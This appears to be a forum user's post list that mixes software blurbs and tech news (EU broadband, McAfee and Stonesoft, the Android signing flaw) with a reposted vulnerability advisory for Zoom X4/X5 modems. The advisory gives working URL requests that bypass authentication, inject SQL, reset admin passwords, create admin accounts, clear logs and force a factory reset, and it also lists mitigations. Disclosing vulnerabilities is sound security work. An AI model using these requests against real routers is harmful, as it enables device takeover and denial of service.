    If you’re a web programmer, there are a number of tools on the market to enable you to code up your web pages as quickly as possible. Perhaps you prefer to code everything by hand, so an advanced text editor will suffice. Others will want to go further and Macromedia Dreamweaver is the choice with design professionals, enabling you to have a complete control over the pages that make up your web site. However, if you’re new to web design, you have two options: pay a professional to design your own site or simply do it yourself. Sadly there aren’t too many excellent WYSIWYG (what you see is what you get – meaning you simply have to drag and drop images and text on to an interface, much like a desktop publisher) applications on the PC. Strangely there has been a plethora of excellent WYSIWYG web editors on the Mac platform, with Apple’s iWeb, RapidWeaver and SandVox. These all use templates to enable you to simply drag your media content on to existing professional templates, so you can quickly design a professional web site. WYSIWYG Web Builder is a Windows equivalent of these applications, but with even more flexibility. It enables you to design from scratch or from one of the many supplied templates. You can drop in a number of Windows objects such as ActiveX code and also Flash media files and, when you’ve finished your design, test and then upload to your homepage. Download Link
  20. Matt
    Opera is a popular browser with some of the best support for standards. Opera 11 promises even faster web surfing, built in spell checker and HTML emails. The faster web browsing is thanks to a new rendering engine, this is the software used to create the web pages. It also claims to support web standards properly including the Acid3 test (click the link to see how your current browser fares). Acid3 is an extreme test, a more visible effect will be the support for web fonts. Most browsers can only use the fonts installed on the computer. Web designers often give the browser a list of fonts. The font they would actually liked used, a similar but more common font and then let the browser choose its own serif or sans-serif font. Web fonts let the browser load the font from a website. Auto-update is one improvement we are pleased to see as it is a simpler process than having to download a installer. Opera 12 is a major upgrade with a host of new features. The primary changes are speed improvements, through hardware acceleration. Note that this is Mac OS X version of the browser. Download Link
  21. Matt
    Description : Zoom X4 and X5 modems suffers from authentication bypass and remote SQL injection vulnerabilities. Author : Kyle Lovett Source : Zoom X4 / X5 SQL Injection / Authentication Bypass ? Packet Storm Code : Vulnerable Products - Zoom X4 ADSL Modem and Router running Nucleus/4.3 UPnP/1.0Virata-EmWeb/R6_2_0 Server All GS Firmware versions Zoom X5 ADSL Modem and Router running Nucleus/4.3 UPnP/1.0Virata-EmWeb/R6_2_0 Server All GS Firmware versions Note: A similar vulnerability was reported several years ago on the Zoom X3 ADSL Modem using a SOAP API call. Many of these vulnerabilities affect X3 in the same manner, without needing to use a SOAP API. =================================== Vulnerability- When UPnP services and WAN http administrative access are enabled, authorization and credential challenges can be bypassed by directly accessing root privileged abilities via a web browser URL. All aspects of the modem/router can be changed, altered and controlled by an attacker, including gaining access to and changing the PPPoe/PPP ISP credentials. ==================================== Timeline with Vendor- Have had no response from Zoom Telephonics since first reporting the problem on June 28. Subsequent emails have been sent with no response. Root Cause Observed- -As in most IGD UPnP routers and modems, where root vulnerabilities are prevalent, these modems contain the same privileged tunnel between either side of the router to be traversed without authentication. The code and layout of the device plays a large role as well. Code/Script Vulnerabilities- -Form tags and actions ids usually hidden are easily seen from the html source, no sanitization of client side input is occurring and root overrides such as 'Zadv=1' can be invoked by any user. -No cookie authentication is done once several of the first bypass is executed, allowing for "Cookie: sessionId=invalid" to pass admin commands. -The SQL injection UNION SELECT 1,2,3,4,5,6,7-- added to the end of any URL page calling a table value, such as /MainPage?id=25, will bring up the system status page, with each interface visible and selectable. Patches or Fixes- At this time, there are no known patches or fixes. Vulnerability proofs and examples- All administrative items can be accessed through these two URLs --Menu Banner http://<IP>/hag/pages/toc.htm -Advanced Options Menu http://<IP>/hag/pages/toolbox.htm Example commands that can be executed remotely through a web browser URL, or a modified HTTP GET/POST requests- -Change Password for admin Account On Firmware 2.5 or lower http://<IP>/hag/emweb/PopOutUserModify.htm/FormOne&user=admin&ex_param1=admin&new_pass1=123456&new_pass2=123456&id=3&cmdSubmit=Save+Changes On Firmware 3.0- http://<IP>/hag/emweb/PopOutUserModify.htm?id=40&user=admin&Zadv=1&ex_param1=admin&new_pass1=123456&new_pass2=123456&id=3&cmdSubmit=Save+Changes -Clear Logs http://<IP>/Action?id=76&cmdClear+Log=Clear+Log -Remote Reboot to Default Factory Settings- Warning - For all intents and purposes, this action will almost always result in a long term Denial of Service attack. http://<IP>/Action?reboot_loc=1&id=5&cmdReboot=Reboot -Create New Admin or Intermediate Account- On Firmware 2.5 or lower http://<IP>/hag/emweb/PopOutUserAdd.htm?id=70&user_id="newintermediateaccount"&priv=v2&pass1="123456"&pass2="123456"&cmdSubmit=Save+Changes On Firmware 3.0- http://<IP>/hag/emweb/PopOutUserAdd.htm?id=70&Zadv=1&ex_param1=adminuser_id="newadminaccount"&priv=v1&pass1="123456"&pass2="123456"&cmdSubmit=Save+Changes Mitigation and Workarounds- Adv.Options --> UPnP --> --> Disable UPnP --> Write Settings to Flash --> Reboot Adv.Options --> Firewall Configuration --> Enable 'Attack Protection' 'DOS Proctection''Black List'--> Write Settings to Flash Adv.Options --> Management Control --> Disable WAN Management from all fields --> Write Settings to Flash Always change the default Username and Password, though this will nothelp mitigate this vulnerability
  22. Matt
    European citizens are showing an increasing demand for high-speed broadband services, as almost half say they would switch to higher speed services when they are made available. Research of almost 30,000 citizens by the European Commission (EC) found that 45 percent of households would be willing to upgrade or switch suppliers if it meant they would receive faster internet connections. This is a marked increase on the same findings in 2012 when only 14 percent of citizens surveyed said they would be willing to pay more to upgrade. Vice president for the Digital Agenda, Neelie Kroes, said the result should act as an incentive for internet service providers to continue to boost the speeds of their networks to capitalise on this pent-up demand. "Consumers increasingly care about their internet being fast enough to watch videos, for example. And for those who run businesses from their home, speed is also a competitiveness issue,” she said. “Consumers now focus on both speed and price when making their choices.” The findings come after a recent report found that the average speed on offer in the EU is 19Mbps. While this is fairly impressive, it is some way short of the 30Mbps for all by 2013 pledge made by the EC as part of its commitment to boosting the digital infrastructure of the region. Other issues thrown up by the survey found that video blocks on sites like YouTube are the most annoying copyright issue for web users, while one third of those questioned use VoIP services like Skype to make calls over their internet connections. Another area of interest, which Kroes was quick to seize on to further her single market telecoms agenda, was the fact that 54 percent of households limit their national and international mobile phone calls because of concerns about cost. "This is the smartphone era, where high-quality mobile services are an essential part of daily life. It’s not acceptable for half the population to be limiting their phone calls because of cost issues, and it’s not acceptable that the lack of a connected single market encourages those limitations,” Kroes said. Kroes can take some solace in the fact, though, that the 2013 survey saw an 11 percent drop, from 60 percent to 49 percent, in the numbers of people worried about the cost of calls to networks other than their own domestic networks. This suggests the EC's efforts to reduce mobile termination rates are having a positive impact, but no doubt Kroes will be keen to see her next set of proposals through to improve this for next year's report. Sursa V3.co.uk
  23. Matt
    McAfee has finalised its deal to acquire Stonesoft, announcing plans to offer advanced next-generation firewall technology acquired as part of the deal to its customers. The deal was announced in May when McAfee paid $389m to buy the Finnish firm. Now the deal has completed the Stonesoft team will become a part of the McAfee Network Security Business Unit led by Pat Calhoun. Stonesoft regional director, Ashish Patel, told V3 the deal is designed to offer businesses next-generation protection against the sea of evolved targeted attacks facing them. "Before next generation firewall technology came to market firewalling was quite a point product - so you had your firewall technology then you had your AV added onto that and so on," he said. "The next generation firewall technology is about bringing all of that together to deal with advanced threats. The threats we see on a daily basis are evolving and rapidly becoming much more complex and fluid in the way they attack. It can be quite difficult for companies to maintain the level of security they need to protect their businesses. That's where firewalling and intrusion prevention systems come into place." Patel said the upgraded tech will vastly bolster McAfee's existing firewall portfolio, boasting it will be a key tool in the firm's network security expansion strategy. "McAfee does have firewall technology but it's proxy based, this is obviously a next generation Firewall that they've taken on board. One of the key reasons to take on the technologies is to ensure McAfee itself holds a competitive advantage in the network security space, adding to the portfolio," he told V3. Patel added that Stonesoft will continue to support its existing 6,500 customers and will honour its forecast update and strategy announcements. Network security is forecast to be a boom area in the security industry. Gartner estimates that the market will boast a seven percent compound annual growth rate (CAGR) over the next five years and be worth $11.4bn by 2017. McAfee is one of many companies expanding its technology portfolio to deal with the recent influx of targeted attacks hitting businesses. Most recently competing security firm MalwareBytes acquired US firm Zero Vulnerability Labs, adding its flagship ExploitShield browser protection service to its anti-hacker arsenal. Sursa V3.co.uk
  24. Matt
    Google has released an emergency fix plugging a security vulnerability that was affecting 99 percent of all Android devices. A Google spokesman confirmed to V3 the company has released the patch to core partners and OEMs, but added the firm is yet to see any evidence suggesting the flaw has been actively exploited by cyber criminals. Even with the patch fix released, it will still remain up to manufacturers and partner companies to roll it out to the general public. In the past companies have been slow to release updates to Android. The vulnerability was originally reported by security firm Bluebox and reportedly affects every version of Android since 1.6. and could be used to target any Google phone or tablet released in the last four years. Bluebox security chief technology officer Jeff Forristal said the flaw relates to the cryptographic signature of Android apps. Theoretically if exploited the flaw could allow hackers to turn legitimate applications into defence-dodging Trojans. This is largely due to the fact most companies, like Samsung, Sony and HTC have chosen to customise the Android version used on their devices which need to be optimised for each new version of the OS released by Google. The slow update cycle means that in the past older versions of Android, like Gingerbread have been the most commonly used. It was only this month that Google's latest Jelly Bean Android version overtook Gingerbread to become the most common version of the OS. Security experts have highlighted the slow update cycle as causing numerous problems outside of the Master Key issue reported by Bluebox. Most recently experts from Trend Micro and Kaspersky said even with the release Android's fragmented nature makes it difficult to fully secure the operating system, making it laborious and costly for security firms to fully support all Android versions. Sursa V3.co.uk
      • 1
      • Upvote
  25. Matt
    The government’s 'digital by default' strategy has come under fire for lacking clear insights into the supposed cost savings it is delivering, and there are major security concerns it could open up networks to attack and put public data at risk. The issues were raised by the Science and Technology Committee in response to answers given by Cabinet Officer minister Francis Maude on 17 June. In response to his statements, and those of other witnesses, the chair of the Science and Technology Committee Andrew Miller raised several issues. The most worrying issue was raised around security. Miller wrote that evidence given by the vice president of the Royal Academy of Engineering, Martyn Thomas, concerned the committee the government was leaving itself open to attack due to the policy it is pursuing. “We are concerned that inadequacies in government software may lead to security vulnerabilities. The committee would like to know whether the government is confident that software developed meets the highest engineering standards,” he wrote in the letter to Maude. Miller added that Martyn had also raised the point that the government could be “importing the security vulnerabilities of authorised ID assurance providers into their online services”. He added that “sensitive personally identifiable data could be compromised” as a result, and he urged the government to do more to ensure citizens trust the government with their personal data. “It appears that the public are unable to ascertain whether online government services are developed adequately to withstand cyber attacks. The committee suggests that the government should be clearer with the public about this," he said. Secondly, on the issue of cost savings, Miller said it was “surprising” that Maude had said it was hard to ascertain exactly how much was being saved by moving government transactions online, given the fact savings had been a key part of the strategy outlined by government. “A key justification of the strategy is savings to the taxpayer. It is not evident to the committee that the Government has a handle on measuring these savings,” he wrote in a letter to Maude. “We welcome your message that savings are being made but urge the government to be clearer about the detail of both savings being made as services become digital by default, as well as the costs of designing, or redesigning, the services.” A Cabinet Office spokesperson told V3 it would respond formally to the concerns in due course but was confident the project was both delivering value for money and was secure. “We have ensured that privacy and security are designed in to our Identity Assurance programme by working with experts, industry and government departments to develop the service,” the spokesperson said. “It will be based on published standards of security and information assurance, and identity providers will have to be certified as meeting these standards.” The Cabinet Office has said in the past that it has saved £10bn from cutbacks including reducing its IT estate and renegotiating contracts. Sursa V3.co.uk
×
×
  • Create New...